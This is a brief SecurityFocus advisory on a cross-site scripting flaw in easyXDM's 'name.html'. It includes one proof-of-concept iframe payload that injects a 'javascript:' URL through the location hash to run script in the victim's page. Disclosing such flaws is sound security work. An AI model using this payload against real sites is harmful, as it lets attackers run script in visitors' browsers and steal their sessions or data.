easyXDM 'name.html' Cross Site Scripting Vulnerability

To exploit this issue an attacker must entice an unsuspecting victim to open a malicious URI.

The following example data is available:

<iframe id=f></iframe><iframe name="easyXDM_constructor_provider"src="http://www.example.com/example/bridge.html"; onload="document.getElementById('f').src='http://www.example.com//name.html#_3constructor,javascript:alert(document.domain)//';"> </iframe>location.hash value


 

Privacy Statement
Copyright 2010, SecurityFocus